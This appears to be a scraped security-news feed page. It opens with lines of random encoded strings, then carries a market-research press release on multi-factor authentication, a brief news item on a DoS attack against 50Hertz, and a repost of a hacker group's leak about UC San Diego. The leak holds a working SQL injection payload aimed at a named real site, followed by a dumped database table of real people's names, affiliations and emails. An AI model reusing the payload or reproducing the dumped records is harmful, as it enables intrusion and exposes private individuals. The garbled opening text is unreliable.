M7oG3w2rcSrG6phwav7/WiRrdA3Tx3/pdimAxlPkHEPAUIp6xQQ28g==
aQRNGyrgreKYH32TFjkE4HFZXCP8qgAjnpS2zAkJ/4P3npvRDztJZg==
GQ4R313QfGGmi+dCzonReIc0FKXySBKTzVPpGLBC7VYYAQmmDJKgeg==
ExptiTMgzeqyjOEWVgunB6aQjq4Fv8K02Mjm9uXCxaixaDz1/icA1w==
RzrnFZXhdLVJ2o/z8gkiinGyMaIaJAU7411/KsilRlJZKJMQumcvbg==
R/fl+1Elu/x+iITp6NmmxyWK0XSxvXWrfHGt35lka7OWYzSk9/2Y8w==
gVnodC/W8MjDeCupGmDpzdySoLl2CyyaLO4e7adCNvFOYmOcq/G0eQ==
A8wt1E1nYn4GZPT8xsr9kFxRO83ESY1Kq3e3Mz/MCXQwzq4Ru3/87w==
icrlXxgMsvahk1ECDoJnSR2CrABOjod3vL+T1azq5jdd3X3s7hufag==
AS0NyI/TvvCEr0QMfEl5OruPUJXx2dSflVWBRnTugillttSC0H5Ruw==
9YiSWruROSRIpX73B6iOvQYHCyr8utdqjOsGG+Rej6fhQs3fJtBVTg==
Yk0kc+gfLkKpfeiyEu0DZijwkTwBiPH+lXlOCgFHhnQUT8uQs6QwPA==
sthX64z61K8w/Y0SaCqk3p/po4EZv1ysr4qKYa





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


Multi-Factor Authentication Market Growing at a CAGR of 17.3% to Reach $5.45 Billion by 2017- New Report by MarketsandMarkets

$
0
0

[275 Pages Report] Multi-Factor Authentication Market (MFA) report segments multi-factor authentication by type such as Smart Card with pin, Smart Card with Biometric Technology, Multifactor Biometric Technology and Smart Card with Pin and Biometric Technology.


MarketsandMarkets
MFA has become the most important part of security due to increase in unauthorized access, frauds, border intrusion, etc.
(PRWEB) December 23, 2012

According to a new market research report “Multi-Factor Authentication Market- By Model / type (two, three, four & five-factor), Application (Banking & Finance, Healthcare, Government, Defense, Travel & immigration, Consumer Electronics and Commercial Security)& by Geography – Forecasts (2012 – 2017)” published by MarketsandMarkets (http://www.marketsandmarkets.com), the total market is expected to reach $5.45 billion by 2017, at a CAGR of 17.3%.
Browse 118 market data tables with 31 figures spread through 275pages and in-depth TOC of "Multi-Factor Authentication Market- By Model / type (two, three, four & five-factor), Application (Banking & Finance, Healthcare, Government, Defense, Travel & immigration, Consumer Electronics and Commercial Security)& by Geography – Forecasts (2012 – 2017)".
http://www.marketsandmarkets.com/Market-Reports/multi-factor-authentication-market-877.html
Early buyers will receive 10% customization on reports.
Multi-factor authentication Market(MFA) implies user and employee authentication by verifying two or more authentication techniques (hardware token, One Time Password, Password/PIN, and biometric traits) provided by him/her. MFA has become the most important part of security due to increase in unauthorized access, frauds, border intrusion, etc. MFA is increasingly getting deployed at all the security checkpoints of airports, commercial complex, retail malls, banking & finance, etc. MFA provides accurate authentication and negligible margin of duplicity or error.
This report describes the various types of biometric and non-biometric technologies such as hardware and software tokens, OTP (One Time Password), and biometric recognition that are being used for different applications. The above-mentioned techniques can be combined to form two-, three-, four-, and five-factor authentication models. Out of these models, two-factor authentication is commonly used in most of the applications. Two-factor authentication is the oldest type of MFA technique and can be seen at banks, ATMs, and various government offices.
The report also throws light on the various application areas of MFA technology such as government, banking and finance, travel and immigration, defense, consumer electronics, commercial security, and healthcare. MFA technology is slowly spreading across all the industries wherever security is of the prime concern. MFA is largely deployed in the application areas like government, travel and immigration, banking & finance, and defense.
Two-factor authentication model covers almost 90% of the market for multi-factor authentication, wherein banking & finance, travel & immigration, commercial security are the major applications. Three, four-, and five-factor authentication models are less used when compared to two-factor authentication. The three-factor authentications include smart card with pin and biometric technology, smart card with two biometric technologies, pin with two biometric technologies and three biometric authentications. On the other hand, four- and five-factor authentication includes the use of smart card and pin with more than one type of biometric technology such as face recognition, fingerprint recognition, voice recognition, etc. Three-factor authentication is mostly used in private access areas like bank lockers, secret data access, defense and travel & immigration. The use of four- and five-factor authentication models is restricted to high cost projects in defense, research, and government-based applications.
Global MFA market is expected to reach $5.45 billion by 2017, at an estimated CAGR of 17.3%. North America is the biggest multi-factor authentication market; followed by Europe and APAC. In ROW, Middle East and Africa are the largest contributors.
About MarketsandMarkets
MarketsandMarkets is a global market research and consulting company based in the U.S. We publish strategically analyzed market research reports and serve as a business intelligence partner to Fortune 500 companies across the world.
MarketsandMarkets also provides multi-client reports, company profiles, databases, and custom research services. MarketsandMarkets covers thirteen industry verticals, including advanced materials, automotive and transportation, banking and financial services, biotechnology, chemicals, consumer goods, energy and power, food and beverages, industrial automation, medical devices, pharmaceuticals, semiconductor and electronics, and telecommunications and IT.
We at MarketsandMarkets are inspired to help our clients grow by providing apt business insight with our huge market intelligence repository. To know more about us and our reports, please visit our website http://www.marketsandmarkets.com
Contact:
Mr. Rohan
North - Dominion Plaza,
17304,Preston Road,
Suite 800, Dallas, TX 75252 U.S.
Tel: 1-888-600-6441
Email: sales(at)marketsandmarkets(dot)com

European renewable power grid rocked by cyber-attack

$
0
0

A German power utility specialising in renewable energy was hit by a serious cyber-attack two weeks ago that lasted five days, knocking its internet communications systems offline, in the first confirmed digital assault against a European grid operator.

“It was a DOS (‘Denial Of Service’) attack with a botnet behind it,” Boris Schucht, the CEO of 50Hertz told EurActiv on the fringes of a Brussels renewables conference. “It blocked our internet domains so that in the first hours, all email and connectivity via the internet was blocked.”


DOS attacks involve thousands of requests being sent to a server each second to clog up a system’s functioning.
Electricity supplies were not affected in the onslaught, which was “serious but not dangerous,” Schucht said. Email services were quickly repaired, although a fix to the problem was only discovered five days later

read more....http://www.cyberwarzone.com/european-renewable-power-grid-rocked-cyber-attack?utm_source=twitterfeed&utm_medium=twitter

Hacked - University California - San Diego - #GSec

$
0
0
As always this information is for education purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the University California - San Diego attack. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,
The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.






============================================================================================
Leaked by the one and only....


       ____                ____                       _ _      
                    / ___|_ __ ___ _   _/ ___|  ___  ___ _   _ _ __(_) |_ _   _
                   | |  _| '__/ _ \ | | \___ \ / _ \/ __| | | | '__| | __| | | |
                   | |_| | | |  __/ |_| |___) |  __/ (__| |_| | |  | | |_| |_| |
                    \____|_|  \___|\__, |____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                   |___/                                  |___/
============================================================================================
About the leak:

First and foremost, this leak wasn't for "educational purposes", nor was it for any reason.
We(#GSec) simply do shit for the #LuLz, and because, well it's simple. We wreck shit, because we can. So without any more further ado, I guess it's time we step-back and dust off the ole' #BlackHat. That's right, we are tired of taking on operations where, we do things for a specific reason and then the deep-web and other/s take the liberty nay have the balls to give our credit to ANONYMOUS. From here on out, IF THE HASH-TAG SAYS #GSEC, ITS FUCKING GREY-SECURITY, NOT ANONYMOUS.

WE ARE OUR OWN NATION.
WE ARE OUR OWN DEEP-WEB.
BE PREPARED.

We are tired of pussy's hiding behind mask/s and taking credit for data that ISN'T THEIRS.
We are tired of being Mr. Nice Guy.
We are tired of the bullshit.

You created the monster, now you deal with it.
============================================================================================
#Target: www.ucsd.edu / University California - San Diego.

#Their Vulnerability:
MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: name=CyThesaurus-ID-Mapping' AND (SELECT 1415 FROM(SELECT COUNT(*),CONCAT(0x3a796c733a,(SELECT (CASE WHEN (1415=1415) THEN 1 ELSE 0 END)),0x3a7278663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'htkh'='htkh

(Among others)
==============================================================================================
Their Data:

Database: cyplugindb
Table: authors
[368 entries]
+----------------+-----------------------------------------+------------------+----------------------------------+----------------+
| author_auto_id | names                                   | email            | affiliation                      | affiliationURL |
+----------------+-----------------------------------------+------------------+----------------------------------+----------------+
| 416            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 420            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 129            | Gary Bader                              | baderg@mskcc.org | MSKCC                            | <blank>        |
| 130            | Ryan M. Kelley                          | <blank>          | UCSD                             | <blank>        |
| 176            |  Allan Kuchinsky                        | <blank>          | Agilent Technologies             | <blank>        |
| 414            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 192            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 136            | Marcio Rosa da Silva                    | mrs@gbf.de       | <blank>                          | <blank>        |
| 412            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 206            | Jing Gao, Alex Ade                      | <blank>          | <blank>                          | <blank>        |
| 208            | Fabien Jourdan                          | <blank>          | INRA                             | <blank>        |
| 219            | Laurence Calzone                        | <blank>          | Institut Curie                   | <blank>        |
| 218            | Eric Viara                              | <blank>          | Institut Curie                   | <blank>        |
| 481            | Maital Ashkenazi                        | <blank>          | HUJI                             | <blank>        |
| 217            | Andrei Zinovyev                         | <blank>          | Institut Curie                   | <blank>        |
| 220            | Emmanuel Barillot                       | <blank>          | Institut Curie                   | <blank>        |
| 229            | Martin Kuiper                           | <blank>          | VIB                              | <blank>        |
| 241            | Lukasz Salwinski                        | <blank>          | UCLA                             | <blank>        |
| 228            | Steven Maere                            | <blank>          | VIB                              | <blank>        |
| 238            | Michael Creech,                         | <blank>          | Blue Oak Software                | <blank>        |
| 276            | Samad Lotia                             | <blank>          | UCSD                             | <blank>        |
| 249            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 410            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 408            | Pekka Salmela                           | <blank>          | Turku University                 | <blank>        |
| 255            | Pekka Salmela                           | <blank>          | University of Turku, Finland     | <blank>        |
| 351            |  Allan Kuchinsky                        | <blank>          | Agilent Technologies             | <blank>        |
| 305            | Allan Kuchinsky                         | <blank>          | Agilent Technologies             | <blank>        |
| 311            | <blank>                                 | <blank>          | Leaf Bioscience s.r.l.           | <blank>        |
| 310            | Andrea Splendiani                       | <blank>          | University of Rennes 1           | <blank>        |
| 508            | Maital Ashkenazi                        | <blank>          | HUJI                             | <blank>        |
| 1047           | Keiichiro Ono                           | <blank>          | UCSD Department of Medicine      | <blank>        |
| 660            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 327            | Jan Baumbach                            | <blank>          | Bielefeld University             | <blank>        |
| 425            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 326            | Jan Baumbach                            | <blank>          | Bielefeld University             | <blank>        |
| 335            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 377            | Svetlana Pacifico                       | <blank>          | WSU CMMG Finley Lab              | <blank>        |
| 421            | Keiichiro Ono                           | <blank>          | UCSD Bioengineering Ideker Lab   | <blank>        |
| 689            | A. Ferro                                | <blank>          | University of Catania            | <blank>        |
| 519            | Samad Lotia and Han-Yu Chuang           | <blank>          | UCSD                             | <blank>        |
| 376            | Russ Finley                             | <blank>          | WSU CMMG                         | <blank>        |
| 360            | Keiichiro Ono                           | <blank>          | UCSD Bioengineering              | <blank>        |
| 355            | Gary Bader                              | <blank>          | Uniersity of Toronto             | <blank>        |
| 385            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 797            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 387            | Ryan Kelley                             | <blank>          | UCSD                             | <blank>        |
| 400            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 398            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 397            | Iliana Avila-Compillo                   | <blank>          | ISB                              | <blank>        |
| 401            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 403            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 402            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 404            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 405            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 407            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 427            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 442            | Jan Baumbach                            | <blank>          | Bielefeld University             | <blank>        |
| 399            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 444            | Jan Baumbach                            | <blank>          | Bielefeld University             | <blank>        |
| 441            | Jan Baumbach                            | <blank>          | Bielefeld University             | <blank>        |
| 443            | Jan Baumbach                            | <blank>          | Bielefeld University             | <blank>        |
| 699            | Mike Smoot                              | <blank>          | UC San Diego                     | <blank>        |
| 454            | Lukasz Salwinski                        | <blank>          | UCLA                             | <blank>        |
| 453            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 464            | Ryan Kelley                             | <blank>          | UCSD                             | <blank>        |
| 693            | D. Skripin                              | <blank>          | University of Catania            | <blank>        |
| 478            | Pekka Salmela                           | <blank>          | University of Turku, Finland     | <blank>        |
| 489            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 493            | Martin Kuiper                           | <blank>          | VIB                              | <blank>        |
| 492            | Steven Maere                            | <blank>          | VIB                              | <blank>        |
| 503            | Ryan Kelley                             | <blank>          | UCSD                             | <blank>        |
| 506            | Jay Konieczka                           | <blank>          |  University of Arizona           | <blank>        |
| 507            |  Kevin Drew                             | <blank>          |  Courant Institute, NYU.         | <blank>        |
| 510            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 518            | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 799            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 638            | Samad Lotia                             | <blank>          | UCSD                             | <blank>        |
| 544            | Patrick J. McSweeney                    | <blank>          | Syracuse University              | <blank>        |
| 690            | R. Giugno                               | <blank>          | University of Catania            | <blank>        |
| 691            | G. Pigola                               | <blank>          | University of Catania            | <blank>        |
| 557            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 1048           | Keiichiro Ono                           | <blank>          | UCSD Department of Medicine      | <blank>        |
| 562            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 558            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 554            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 566            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 564            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 587            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 578            | Jan Baumbach                            | <blank>          | University of Bielefeld          | <blank>        |
| 591            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 590            | Iliana Avila-Compillo                   | <blank>          | ISB                              | <blank>        |
| 579            | Tobian Wittkp                           | <blank>          | University of Bielefeld          | <blank>        |
| 594            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 1046           | Keiichiro Ono                           | <blank>          | UCSD Department of Medicine      | <blank>        |
| 597            | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 692            | A. Pulvirenti                           | <blank>          | University of Catania            | <blank>        |
| 1051           | Keiichiro Ono                           | <blank>          | UCSD Department of Medicine      | <blank>        |
| 629            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 897            | Fei Li                                  | <blank>          | BMI NUDT                         | <blank>        |
| 659            | Leonard Apeltsin                        | <blank>          | UCSF                             | <blank>        |
| 637            | Samad Lotia and Han-Yu Chuang           | <blank>          | UCSD                             | <blank>        |
| 644            | Keiichiro Ono                           | <blank>          | UCSD Bioengineering              | <blank>        |
| 652            | Keiichiro Ono                           | <blank>          | UCSD Bioengineering              | <blank>        |
| 970            | Jianjiong Gao                           | <blank>          |  U. Missouri                     | <blank>        |
| 971            |  Keiichiro Ono                          | <blank>          |  UCSD                            | <blank>        |
| 694            | G.D. Bader                              | <blank>          | University of Toronto            | <blank>        |
| 695            | D. Shasha                               | <blank>          | New York University              | <blank>        |
| 676            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 685            | Melissa S. Cline                        | <blank>          | UCSC                             | <blank>        |
| 895            | Keiichiro Ono                           | <blank>          | UCSD                             | <blank>        |
| 687            | Nathan Salomonis                        | <blank>          | The Gladstone Institutes         | <blank>        |
| 688            | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 706            | Melissa S. Cline                        | <blank>          | UCSC                             | <blank>        |
| 969            |  Keiichiro Ono                          | <blank>          |  UCSD                            | <blank>        |
| 709            | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 708            | Nathan Salomonis                        | <blank>          | The Gladstone Institutes         | <blank>        |
| 968            | Jianjiong Gao                           | <blank>          |  U. Missouri                     | <blank>        |
| 726            | Leonard Apeltsin                        | <blank>          | UCSF                             | <blank>        |
| 727            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 766            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 752            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 755            | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 762            |  Christian von Mering                   | <blank>          | University of Zurich             | <blank>        |
| 837            | Annabel Bourde and Carito Guziolowski   | <blank>          |  IRISA                           | <blank>        |
| 761            | Milan Simonovic                         | <blank>          | University of Zurich             | <blank>        |
| 783            | Wenjian Xu                              | <blank>          | BMI                              | <blank>        |
| 784            | Peng Li                                 | <blank>          | BMI                              | <blank>        |
| 782            | Fei Li                                  | <blank>          | NUDT/BMI                         | <blank>        |
| 787            | Steven Maere                            | <blank>          | VIB                              | <blank>        |
| 791            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 795            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 821            | Tobias Wittkop                          | <blank>          | Bielefeld University             | <blank>        |
| 813            | Tobias Wittkop                          | <blank>          | Bielefeld University             | <blank>        |
| 817            | Tobias Wittkop                          | <blank>          | Bielefeld University             | <blank>        |
| 815            | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 819            | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 823            | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 827            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 841            | Wenjian Xu                              | <blank>          | BMI                              | <blank>        |
| 840            | Fei Li                                  | <blank>          | NUDT/BMI                         | <blank>        |
| 839            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 860            | C.Letondal                              | <blank>          | Pasteur institute and LRI        | <blank>        |
| 859            | T.Aittokallio                           | <blank>          | <blank>                          | <blank>        |
| 1289           | Younghoon Kim, Doheon Lee               | <blank>          | KAIST                            | <blank>        |
| 843            | Fei Li                                  | <blank>          | NUDT/BMI                         | <blank>        |
| 858            | C.Weber                                 | <blank>          | Pasteur institute                | <blank>        |
| 857            | C.Malabat                               | <blank>          | Pasteur institute                | <blank>        |
| 861            | S.Rousseau                              | <blank>          | Pasteur institute                | <blank>        |
| 856            | M.Clement-Ziza                          | <blank>          | TU-Dresden                       | <blank>        |
| 874            |  Christian von Mering                   | <blank>          | University of Zurich             | <blank>        |
| 873            | Milan Simonovic                         | <blank>          | University of Zurich             | <blank>        |
| 880            | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 990            | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 901            | T.Aittokallio                           | <blank>          | <blank>                          | <blank>        |
| 900            | C.Weber                                 | <blank>          | Pasteur institute                | <blank>        |
| 902            | C.Letondal                              | <blank>          | Pasteur institute and LRI        | <blank>        |
| 899            | C.Malabat                               | <blank>          | Pasteur institute                | <blank>        |
| 898            | M.Clement-Ziza                          | <blank>          | TU-Dresden                       | <blank>        |
| 894            | Ryan Kelley                             | <blank>          | UCSD                             | <blank>        |
| 891            | Keiichiro Ono                           | <blank>          | UCSD Bioengineering Ideker Lab   | <blank>        |
| 903            | S.Rousseau                              | <blank>          | Pasteur institute                | <blank>        |
| 907            | Fabrizio Grassi                         | <blank>          | <blank>                          | <blank>        |
| 966            | Xuemin Liu                              | <blank>          | Iowa State University            | <blank>        |
| 977            | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 961            | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 1902           | Keiichiro Ono                           | <blank>          |  UCSD                            | <blank>        |
| 973            | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 980            | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 979            | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 982            | Peng-Liang Wang                         | <blank>          | UCSD                             | <blank>        |
| 992            | Fei Li                                  | <blank>          | BMI NUDT                         | <blank>        |
| 1126           | Nathan Salomonis                        | <blank>          | The Gladstone Institutes         | <blank>        |
| 1005           | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 1017           | C.Letondal                              | <blank>          | Pasteur institute and LRI        | <blank>        |
| 1016           | T.Aittokallio                           | <blank>          | <blank>                          | <blank>        |
| 1014           | C.Malabat                               | <blank>          | Pasteur institute                | <blank>        |
| 1015           | C.Weber                                 | <blank>          | Pasteur institute                | <blank>        |
| 1018           | S.Rousseau                              | <blank>          | Pasteur institute                | <blank>        |
| 1013           | M.Clement-Ziza                          | <blank>          | TU-Dresden                       | <blank>        |
| 1024           | Keiichiro Ono                           | <blank>          | UCSD Dept. of Medicine           | <blank>        |
| 1033           | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 1050           | Keiichiro Ono                           | <blank>          | UCSD Department of Medicine      | <blank>        |
| 1175           | Tian Xia                                | <blank>          | Iowa State University            | <blank>        |
| 1055           | Keiichiro Ono                           | <blank>          | UCSD Bioengineering              | <blank>        |
| 1833           | Jiang Xie                               | <blank>          | Shanghai University              | <blank>        |
| 1064           | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 1065           | Keiichiro Ono                           | <blank>          |  UCSD                            | <blank>        |
| 1089           | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 1079           | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 1084           | John \\"Scooter\\" Morris               | <blank>          | UCSF                             | <blank>        |
| 1093           | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 1110           | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 1154           | Michal Wozniak                          | <blank>          | University of Warsaw             | <blank>        |
| 1155           | Janusz Dutkowski                        | <blank>          | University of Warsaw             | <blank>        |
| 1843           | Janusz Dutkowski                        | <blank>          | University of Warsaw             | <blank>        |
| 1842           | Michal Wozniak                          | <blank>          | University of Warsaw             | <blank>        |
| 1127           | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 1165           | Pietro Hiram Guzzi Mario Cannataro      | <blank>          | UMG                              | <blank>        |
| 1169           | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 1145           | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 1170           | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 1166           | Ernesto Puleo                           | <blank>          | UMG Student                      | <blank>        |
| 1156           | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 1174           | Ernesto Puleo                           | <blank>          | UMG STUDENT                      | <blank>        |
| 1184           | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 1199           | Xuemin Liu                              | <blank>          | Iowa State University            | <blank>        |
| 1201           | Tamas Nepusz and Alberto Paccanaro      | <blank>          | RHUL                             | <blank>        |
| 1255           | Steven Maere                            | <blank>          | VIB                              | <blank>        |
| 1658           | Mike Smoot                              | <blank>          | UC San Diego                     | <blank>        |
| 1240           | Tobias Wittkop                          | <blank>          | Bielefeld University             | <blank>        |
| 1244           | Tobias Wittkop                          | <blank>          | Bielefeld University             | <blank>        |
| 1248           | Tobias Wittkop                          | <blank>          | Bielefeld University             | <blank>        |
| 1242           | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 1246           | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 1250           | <blank>                                 | <blank>          | <blank>                          | <blank>        |
| 1256           | Steven Maere                            | <blank>          | VIB                              | <blank>        |
| 1258           | Keiichiro Ono and Trey Ideker           | <blank>          | UCSD                             | <blank>        |
| 1262           | Ernesto Puleo                           | <blank>          | UMG STUDENT                      | <blank>        |
| 1284           |  Christian von Mering                   | <blank>          | University of Zurich             | <blank>        |
| 1280           | GeneMANIA Team                          | <blank>          | University of Toronto            | <blank>        |
| 1283           | Milan Simonovic                         | <blank>          | University of Zurich             | <blank>        |
| 1295           | Mike Smoot                              | <blank>          | UC San Diego                     | <blank>        |
| 1307           | Tamas Nepusz and Alberto Paccanaro      | <blank>          | RHUL                             | <blank>        |
| 1311           | Tamim and Ruan                          | <blank>          | UTSA                             | <blank>        |
| 1326           | Di Chang                                | <blank>          | University of Dortmund, Germany  | <blank>        |
| 1331           | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 1338           | Kahn Rhrissorrakrai                     | <blank>          | NYU                              | <blank>        |
| 1795           | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 1342           | Layla Oesper                            | <blank>          | Brown University                 | <blank>        |
| 1339           |  Kristin C. Gunsalus                    | <blank>          | NYU                              | <blank>        |
| 1366           | Maital Ashkenazi                        | <blank>          | Evogene                          | <blank>        |
| 1368           | GeneMANIA Team                          | <blank>          | University of Toronto            | <blank>        |
| 1370           | Steven Maere                            | <blank>          | VIB                              | <blank>        |
| 1380           | Pieter Audenaert                        | <blank>          | UGent/IBBT                       | <blank>        |
| 1377           | Steven Maere                            | <blank>          | VIB                              | <blank>        |
| 1379           | Thomas Van Parys                        | <blank>          | VIB/UGent                        | <blank>        |
| 1393           | Wodak Lab                               | <blank>          | <blank>                          | <blank>        |
| 1397           | Keiichiro Ono                           | <blank>          | UCSD                             | <blank>        |
| 1386           | Jianjiong Gao                           | <blank>          | U. of Missouri                   | <blank>        |
| 1396           | Kozo Nishida                            | <blank>          | NAIST                            | <blank>        |
| 1401           | Tamas Nepusz and Alberto Paccanaro      | <blank>          | RHUL                             | <blank>        |
| 1409           | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 1411           | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 1415           | Mike Smoot                              | <blank>          | UC San Diego                     | <blank>        |
| 1419           | John "Scooter" Morris                   | <blank>          | UCSF                             | <blank>        |
| 1429           | Steven Maere                            | <blank>          | VIB                              | <blank>        |
| 1444           |  Kristin C. Gunsalus                    | <blank>          | NYU                              | <blank>        |
| 1443           | Kahn Rhrissorrakrai                     | <blank>          | NYU                              | <blank>        |
| 1451           | Jun S. Yoon                             | <blank>          | AllegroViva Corporation          | <blank>        |
| 1454           | Thomas Kelder                           | <blank>          | Maastricht University            | <blank>        |
| 1459           | Michael Heuer                           | <blank>          | dishevelled.org                  | <blank>        |
| 1465           | Isuru Udana                             | <blank>          |  University of Moratuwa          | <blank>        |
| 1470           | Pieter Audenaert                        | <blank>          | UGent/IBBT                       | <blank>        |
| 1473           | GeneMANIA Team                          | <blank>          | University of Toronto            | <blank>        |
| 1469           | Thomas Van Parys                        | <blank>          | VIB/UGent                        | <blank>        |
| 1520           | Gary Bader                              | <blank>          | University of Toronto            | <blank>        |
| 1519           | Gang Su                                 | <blank>          | University of Michigan           | <blank>        |
| 1518           | Tobias Wittkop                          | <blank>          | Buck Institute                   | <blank>        |
| 1548           | Anne Siegel                             | <blank>          |  INRIA Rennes                    | <blank>        |
| 1547           | Carito Guziolowski                      | <blank>          | University of Heidelberg         | <blank>        |
| 1516           | Aaron Newman                            | <blank>          | UCSB                             | <blank>        |
| 1515           | John "Scooter" Morris, Leonard Apeltsin | <blank>          | UCSF                             | <blank>        |
| 1538           | Tobias Wittkop                          | <blank>          | Buck Institute                   | <blank>        |
| 1536           | Aaron Newman                            | <blank>          | UCSB                             | <blank>        |
| 1539           | Gang Su                                 | <blank>          | University of Michigan           | <blank>        |
| 1535           | John "Scooter" Morris, Leonard Apeltsin | <blank>          | UCSF                             | <blank>        |
| 1540           | Gary Bader                              | <blank>          | University of Toronto            | <blank>        |
| 1562           | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 1550           | Chinmoy Bhatiya                         | <blank>          | <blank>                          | <blank>        |
| 1554           | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
| 1576           | D. Shasha                               | <blank>          | New York University              | <blank>        |
| 1574           | D. Skripin                              | <blank>          | University of Catania            | <blank>        |
| 1575           | G.D. Bader                              | <blank>          | University of Toronto            | <blank>        |
| 1573           | A. Pulvirenti                           | <blank>          | University of Catania            | <blank>        |
| 1572           | G. Pigola                               | <blank>          | University of Catania            | <blank>        |
| 1571           | R. Giugno                               | <blank>          | University of Catania            | <blank>        |
| 1570           | A. Ferro                                | <blank>          | University of Catania            | <blank>        |
| 1584           | Layla Oesper                            | <blank>          | Brown University                 | <blank>        |
| 1605           | Michael Creech                          | <blank>          | Blue Oak Software                | <blank>        |
